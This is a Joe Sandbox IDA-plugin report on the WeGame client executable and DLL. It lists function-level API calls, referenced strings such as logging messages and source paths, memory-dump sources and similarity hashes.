                                                                • memset.VCRUNTIME140(7FFFFFFF,?,00000000,00000000,?,00000000,?,00000000,0000000F), ref: 6BD0FE5F
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 6BD0FF43
                                                                • memmove.VCRUNTIME140(00000010,00000000,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 6BD0FF51
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 6BD0FF94
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 6BD0FF9C
                                                                • memmove.VCRUNTIME140(7FFFFFFF,00000000,?,00000000,?,00000000,?,00000000), ref: 6BD0FFA8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturnmemset$malloc
                                                                • String ID:
                                                                • API String ID: 1092852243-0
                                                                • Opcode ID: d3a5fbec11ef3d61ad83561e84cb6a1987f37c133fc78a52b68b8495f4e0dd25
                                                                • Instruction ID: 5a3e6ea8c76e85d48f6e1dfe0d9052cf7c1637c05ad4058f91d21e9d95d95043
                                                                • Opcode Fuzzy Hash: d3a5fbec11ef3d61ad83561e84cb6a1987f37c133fc78a52b68b8495f4e0dd25
                                                                • Instruction Fuzzy Hash: BD812472A001059FCB05CF6CDC8059EBBA6FF99360B2006A9EC04DB351DB34DE2697E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BD3444F: __EH_prolog3.LIBCMT ref: 6BD34456
                                                                • ?c_str@path@filesystem@ierd_tgp@@QBEPB_WXZ.COMMON(?,?,00000000), ref: 6BD36AEA
                                                                • ~refcount_ptr.LIBCPMT ref: 6BD36AFD
                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BD36B02
                                                                  • Part of subcall function 6BD33743: __EH_prolog3.LIBCMT ref: 6BD3374A
                                                                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000), ref: 6BD36BDC
                                                                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6BD36C74
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: DebugH_prolog3OutputString$?c_str@path@filesystem@ierd_tgp@@abort~refcount_ptr
                                                                • String ID: Pj#$forced abort due to illegal log prefix [{}]$A
                                                                • API String ID: 3296511426-3686375832
                                                                • Opcode ID: 02962f91328e7826f4ab37eb893c31a21ba895895d7421a05d8f3ecbbaed4b14
                                                                • Instruction ID: b0708c20695e89983fe7bda9586e89d57eac2e53a2f1c7f991904ea008c74365
                                                                • Opcode Fuzzy Hash: 02962f91328e7826f4ab37eb893c31a21ba895895d7421a05d8f3ecbbaed4b14
                                                                • Instruction Fuzzy Hash: 01818271908288EFDF14DBF4C945BDE7BB89F16328F144098D001AB292DB799B09DB72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9A88A
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000140), ref: 6BD9A92D
                                                                  • Part of subcall function 6BD9A178: __EH_prolog3.LIBCMT ref: 6BD9A17F
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(00000000,00000001), ref: 6BD9A970
                                                                  • Part of subcall function 6BD95CE6: __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                  • Part of subcall function 6BD95CE6: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD9A984
                                                                Strings
                                                                • failed, xrefs: 6BD9A9DD
                                                                • [Qos_http_handler] qos report %s: qos_id=%d, seq=%d, response_code=%d, total_time=%.3f, conn_time=%.3f, xrefs: 6BD9A9CF
                                                                • success, xrefs: 6BD9A9EC
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9A9B0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3_Logger@1@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@H_prolog3Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@
                                                                • String ID: [Qos_http_handler] qos report %s: qos_id=%d, seq=%d, response_code=%d, total_time=%.3f, conn_time=%.3f$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp$failed$success
                                                                • API String ID: 3901038974-3525620919
                                                                • Opcode ID: 78f6f1e84a7c4af97d2d23b8ab60d3cbd76b2248cbeebe415eacd4021480c31a
                                                                • Instruction ID: d9ab4816ed64483a5a7177ddc38b026a650f4772207059317a24b85db2cd38c7
                                                                • Opcode Fuzzy Hash: 78f6f1e84a7c4af97d2d23b8ab60d3cbd76b2248cbeebe415eacd4021480c31a
                                                                • Instruction Fuzzy Hash: 9F51BC72C10208DBDF19EB64C892BEDB3B5AF59324F1042D8E5096F190EB789F85CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 00452DC2: __EH_prolog3.LIBCMT ref: 00452DC9
                                                                  • Part of subcall function 00450D26: __EH_prolog3.LIBCMT ref: 00450D2D
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00464139
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(tcls/log), ref: 00464155
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 004641C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@AsyncLogger@1@PushTask@common@ierd_tgp@@V?$function@$$Z@std@@$??_0path@filesystem@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@V012@_invalid_parameter_noinfo_noreturn
                                                                • String ID: !$tcls/log
                                                                • API String ID: 2928327206-1193755044
                                                                • Opcode ID: 5a7ac797c5e311da9716c935e4fbae2a43ec661ed99204d6ae5e42170f70c772
                                                                • Instruction ID: b9422f427fa14e6ff2742c203bcdb59332eca162ceb41a28bb2874148cfe96b8
                                                                • Opcode Fuzzy Hash: 5a7ac797c5e311da9716c935e4fbae2a43ec661ed99204d6ae5e42170f70c772
                                                                • Instruction Fuzzy Hash: C6419E70D01248EBDB08EBA5CD96BDDBBB5AF15308F1441DDE10527282EB782F49CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004586DC
                                                                  • Part of subcall function 0046172D: GetCurrentProcessId.KERNEL32(?,?,004586E8,00000004,00401D82), ref: 0046172F
                                                                  • Part of subcall function 0046172D: memset.VCRUNTIME140(5664TPF_Share_Mem,00000000,00000040,?,?,004586E8,00000004,00401D82), ref: 00461741
                                                                  • Part of subcall function 0046172D: wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(5664TPF_Share_Mem,00000020,TPF_Share_Mem,5664TPF_Share_Mem,00000020,%lu,00000000,5664TPF_Share_Mem,00000000,00000040,?,?,004586E8,00000004,00401D82), ref: 0046175C
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000004,00000000,00000004,00401D82), ref: 004586F3
                                                                • GetLastError.KERNEL32 ref: 00458700
                                                                  • Part of subcall function 0046DCAC: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 0046DCB5
                                                                  • Part of subcall function 0046DCAC: __vfprintf_l.MSPDB140-MSVCRT ref: 0046DCC3
                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000004), ref: 00458724
                                                                • GetLastError.KERNEL32 ref: 00458731
                                                                Strings
                                                                • Could not map view of file (%lu)., xrefs: 00458738
                                                                • Could not open file mapping object (%lu)., xrefs: 00458707
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLast$CreateCurrentH_prolog3MappingProcessView__acrt_iob_func__vfprintf_lmemsetwcscat_s
                                                                • String ID: Could not map view of file (%lu).$Could not open file mapping object (%lu).
                                                                • API String ID: 3062832350-3732869390
                                                                • Opcode ID: ca6ca838f2df83af09f003f5db80a0ad3607a904297816f43d2637395ad02301
                                                                • Instruction ID: 8ead46b84f9dc2e3b77945274bd34c171f9c41072d053b9dabd5d534c4295b43
                                                                • Opcode Fuzzy Hash: ca6ca838f2df83af09f003f5db80a0ad3607a904297816f43d2637395ad02301
                                                                • Instruction Fuzzy Hash: 362193B1A00701DED7206F269C09E16BAE4EF94714B20812FF559DB2A2EFB4C440CB1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                • ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                  • Part of subcall function 6BD4961C: __EH_prolog3_GS.LIBCMT ref: 6BD49623
                                                                • ?get_file_path_by_key@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD470F7
                                                                  • Part of subcall function 6BD4733B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47342
                                                                  • Part of subcall function 6BD4733B: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,?,0000006C,6BD47125,?,?,?,?), ref: 6BD47365
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6BD47188
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD4718F
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD471B3
                                                                • [cfg_mgr]get_cfg failed, path:%s, node_name:%s, xrefs: 6BD471E2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3_catch_$?get_cfg@common@ierd_tgp@@?get_file_path_by_key@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_Logger@1@U?$char_traits@_U?$less@V12@V34@1@V?$allocator@_V?$basic_ptree@V?$basic_string@_Vpath@filesystem@2@Vpath@filesystem@2@@W@2@@std@@W@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: [cfg_mgr]get_cfg failed, path:%s, node_name:%s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp
                                                                • API String ID: 868211161-939106724
                                                                • Opcode ID: c5ef1e3ad510cfca272a45a84982a1d1f02c6a86edb4421fb0f62aa1a11fdaef
                                                                • Instruction ID: 7d66c89d8793df921b37c95c111b2f22ac6c072d5c0379b49f0e4c0fd748634a
                                                                • Opcode Fuzzy Hash: c5ef1e3ad510cfca272a45a84982a1d1f02c6a86edb4421fb0f62aa1a11fdaef
                                                                • Instruction Fuzzy Hash: 93616B70C06288EADF15CFF8C995BCDBBB4AF25318F64819DC044AB281DB795B09CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • strchr.VCRUNTIME140(?,0000003A,00000000,00000000,?,?), ref: 6BF6FE59
                                                                • memmove.VCRUNTIME140(?,?,00000000,?,?), ref: 6BF6FE7E
                                                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(-00000001), ref: 6BF6FE9D
                                                                • htons.WS2_32(00000000), ref: 6BF6FED7
                                                                • strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,1234567890.), ref: 6BF6FEEB
                                                                • gethostbyname.WS2_32(?), ref: 6BF6FF43
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: atoigethostbynamehtonsmemmovestrchrstrspn
                                                                • String ID: 1234567890.
                                                                • API String ID: 532542645-3734169883
                                                                • Opcode ID: de4be6df10ec1a983a35c4e64970cfd39d4344e1cf8affce8ce587f8b3c70dfc
                                                                • Instruction ID: c2669e5e8e3428d919e393e606b4f09ef46207389cd28ba83d37c9941751a829
                                                                • Opcode Fuzzy Hash: de4be6df10ec1a983a35c4e64970cfd39d4344e1cf8affce8ce587f8b3c70dfc
                                                                • Instruction Fuzzy Hash: F2312677A043459BDB50CF34D940BAA77E8BF57344F008A6DED8987221FB3AD50A8751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E858
                                                                • ?StartThread@CThread@@QAEHPAXH@Z.COMMON(00000000,00000000,00000050), ref: 0043E861
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E86A
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E8A9
                                                                Strings
                                                                • Start crash check thread success., xrefs: 0043E8A2
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp, xrefs: 0043E88F, 0043E8CA
                                                                • Start crash check thread FAIL., xrefs: 0043E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3_StartThread@Thread@@
                                                                • String ID: Start crash check thread FAIL.$Start crash check thread success.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp
                                                                • API String ID: 2209094223-3309645343
                                                                • Opcode ID: b88d54ed209928386e363797d2c4ee566b78ee6adbdcdf05c16c5ac3ee981850
                                                                • Instruction ID: 465282a7c89290b7f96fccd01b8d146bc71a8d66bffd407c2e6cc9706683e32c
                                                                • Opcode Fuzzy Hash: b88d54ed209928386e363797d2c4ee566b78ee6adbdcdf05c16c5ac3ee981850
                                                                • Instruction Fuzzy Hash: 5C112570F41710A6CB25BB639C52FAF26208F95B08F21800BB8113B3C6DF6D9E02C68D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDCD999
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9AE
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9B7
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(?,0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9CA
                                                                • GetPrivateProfileIntW.KERNEL32(curl_certificate_info,is_certificate_open,00000000,?), ref: 6BDCD9E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_workingdir_path_ex@?instance@H_prolog3_PrivateProfileV012@V123@Vpath@filesystem@3@
                                                                • String ID: curl_certificate_info$is_certificate_open
                                                                • API String ID: 4076247625-1679244404
                                                                • Opcode ID: 81150c6cb1cb16cb1a3f6a14d2691fe145f45fb2c26e71b86065b236af957c94
                                                                • Instruction ID: 503bc32f1cc03b8f36475f28c2e729a22c46ff6b34510d3a84abd035f70b3f51
                                                                • Opcode Fuzzy Hash: 81150c6cb1cb16cb1a3f6a14d2691fe145f45fb2c26e71b86065b236af957c94
                                                                • Instruction Fuzzy Hash: FDF0A436994184DADF14DFB4C805BDCBFB4BB26229F641058C1A0AA0A0CB3C8648D733
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2EA39
                                                                  • Part of subcall function 6BD2E537: __EH_prolog3.LIBCMT ref: 6BD2E53E
                                                                  • Part of subcall function 6BD1820A: __EH_prolog3.LIBCMT ref: 6BD18211
                                                                  • Part of subcall function 6BD1820A: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD2EA59,00000000,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD1821C
                                                                  • Part of subcall function 6BD1820A: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18233
                                                                  • Part of subcall function 6BD1820A: std::locale::_Getfacet.LIBCPMT ref: 6BD1823D
                                                                  • Part of subcall function 6BD1820A: ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000), ref: 6BD18256
                                                                  • Part of subcall function 6BD1820A: std::_Facet_Register.LIBCPMT ref: 6BD1826E
                                                                  • Part of subcall function 6BD1820A: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18291
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000025,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD2EA75
                                                                  • Part of subcall function 6BD2A623: __EH_prolog3.LIBCMT ref: 6BD2A62A
                                                                  • Part of subcall function 6BD2E69D: __EH_prolog3_GS.LIBCMT ref: 6BD2E6A7
                                                                  • Part of subcall function 6BD2E69D: ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020,?,00000088,6BD2EAB6,00000000), ref: 6BD2E6CA
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020), ref: 6BD2ED0D
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,00000008,?,00000000,?,00000000), ref: 6BD2ED98
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,00000000,?,00000000), ref: 6BD2EDAA
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000000,?,00000000), ref: 6BD2EDC5
                                                                • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(000000FF,?,00000000,?,00000000), ref: 6BD2EDD4
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000000,?,00000000), ref: 6BD2EDE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@D@std@@$?widen@?$ctype@H_prolog3$H_prolog3_Lockit@std@@$??0_??1_?gbump@?$basic_streambuf@Bid@locale@std@@Facet_Getcat@?$ctype@GetfacetRegisterV42@@Vfacet@locale@2@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2851808594-0
                                                                • Opcode ID: 66ae3af4bac3b09527487ac287c4726b2e01897328d985ca9958169fd0e37262
                                                                • Instruction ID: 9c5a8ae7bb9b0077e9824095e02889f2ff5be5c376b6b817be9b9e93060ecde1
